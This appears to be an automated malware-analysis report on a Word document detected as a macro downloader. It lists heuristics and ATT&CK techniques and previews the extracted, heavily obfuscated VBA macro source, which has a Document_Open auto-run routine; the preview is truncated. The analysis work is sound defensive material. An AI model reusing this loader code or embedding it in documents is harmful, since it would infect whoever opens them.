MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the presence of VBA macros, specifically a Document_Open macro, indicate malicious intent. The VBA script is heavily obfuscated but appears to be designed to download and execute a secondary payload, as suggested by the 'Doc.Downloader' ClamAV detection name. The document itself does not contain user-readable content, further supporting its role as a malicious loader.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13115 bytes |
SHA-256: 7f9007659b69e9928aea61e6d8def54c234aabbded1d89a37bf7e4133a7501eb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ecarte(cannibalize, unfetter, materialistically)
Dim parked As Long
Dim headshake As Byte
Dim avunt As Long
Dim especial As Byte
Dim photomicrograph As Long
Dim calorie As Long
Dim slacker As Long
Dim grout As Long
Dim coatdress As Long
Dim aiguille As Long
Dim pipeful As Long
ages = "canning"
egad = egad + 402
parked = cannibalize
coatdress = materialistically
bandog = Math.Round(385)
photomicrograph = unfetter
pupilarity = 33 + 15
Pmt 0, pupilarity, 25315, 12841, 4
janusfaced = Fix(300)
avunt = 53 - 72 + 18
centrum ByVal avunt, parked, photomicrograph, coatdress, slacker
heartstricken = "pipa"
End Function
Sub alternanthera()
Dim linguae As Integer
Dim begawd As Long
little.gerontologist.Value = Day(#12/5/2013#)
varday = ale = "antiparticle"
angelus = "fragmental"
firelight = mantlet
exegetical = "tantaene"
abjure = "lardaceous"
specialized = purely
amnis = "penetrative"
Set borsch = little.gerontologist.SelectedItem
depilatory = 10 + 57
Pmt 0, depilatory, 30951, 55162, 2
fen = borsch.Name
bureaucratically = 100 - 105 + 7849
cygne = Right(fen, bureaucratically)
suds = collect.pair(cygne)
abscess = 13 + 22
Pmt 0, abscess, 20609, 18448, 3
lepidochelys = "grapevine"
configurational = bush
#If (66 - 58 + 392 + 33 - 22 + 289) > ((23 - 90 + 387) - (33 - 59 + 566) * 1) And ((37 - 106 + 97) - (21 - 60 + 67)) * 2 < (Win64) Then
Dim passe As String
Dim baptist As LongPtr
Dim lecanora As LongPtr
Dim threedimensional As String
#ElseIf (8 - 75 + 467 + 22 - 97 + 375) > ((37 - 38 + 321) - (17 - 33 + 556) * 1) And Not ((66 - 53 + 15) - (33 - 9 + 4)) * 2 < (Win64) Then
Dim gaviiformes As Byte
Dim lecanora As Long
Dim conscription As String
Dim baptist As Long
#End If
isotheral = 52 - 25 - 27
acanthocyte = "sifter"
collecting = "neodarwinism"
mascara = 16 - 38 + 4118
thronged = 38 + 50
Pmt 0, thronged, 20721, 59331, 7
hearthrug = abolishment
accurately = "lobipes"
cow = 40 + 9
Pmt 0, cow, 34491, 56175, 5
autobus = suds
aardwolf = "attractiveness"
karachi = "libertinage"
baptist = arctonyx(autobus)
angiologist = "alike"
behead = "one"
#If (27 - 119 + 492 + 46 - 49 + 303) > ((6 - 12 + 326) - (100 - 31 + 471) * 1) And ((128 - 115 + 15) - (117 - 30 - 59)) * 2 < (Win64) Then
Dim antiquity As Long
Dim hiddenite As LongPtr
Dim answerable As LongPtr
Dim linked As LongPtr
schism = 102 - 72 + 2034
#ElseIf (99 - 38 + 339 + 10 - 61 + 351) > ((66 - 40 + 294) - (112 - 67 + 495) * 1) And Not ((109 - 65 - 16) - (101 - 126 + 53)) * 2 < (Win64) Then
Dim hiddenite As Long
electrolysis = 27 - 48 + 802
Dim answerable As Long
Dim linked As Long
schism = electrolysis + 3459
#End If
Dim artificial As String
Dim microdot As Integer
hiddenite = 22 - 125 + 103
lecanora = baptist + schism
answerable = 2 - 107 + 201632
linked = 102 - 76 + 3474
mountie = eira(answerable, hiddenite, lecanora, hiddenite, hiddenite, hiddenite, hiddenite)
bankia = 35 + 20
Pmt 0, bankia, 4045, 46516, 4
End Sub
Private Sub Document_Open()
Dim perceived As Long
Dim binomial As Long
denaturalized = "lagidium"
alternanthera
azymia = 1 + 50
Pmt 0, azymia, 28230, 51730, 7
End Sub
Sub zoom()
With Documents("Sample.doc").Windows(1).View
.Type = wdPrintView
With .zoom
.PageColumns = 3
.PageRows = 2
End With
End With
End Sub
Function observance(embolectomy, agelessness, stealing)
Dim ahuehuete As Long
Dim aglow As Long
Dim astonishingly As LongPtr
Dim catling As LongPtr
Dim diadophis As LongPtr
Dim intermit As Integer
Dim coydog As LongPtr
Dim heartrot As LongPtr
ages = "platyrrhine"
egad = Fix(498)
catling = embolectomy
heartrot = stealing
unreliable = "perdidit"
coydog = agelessness
imitator = 13
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.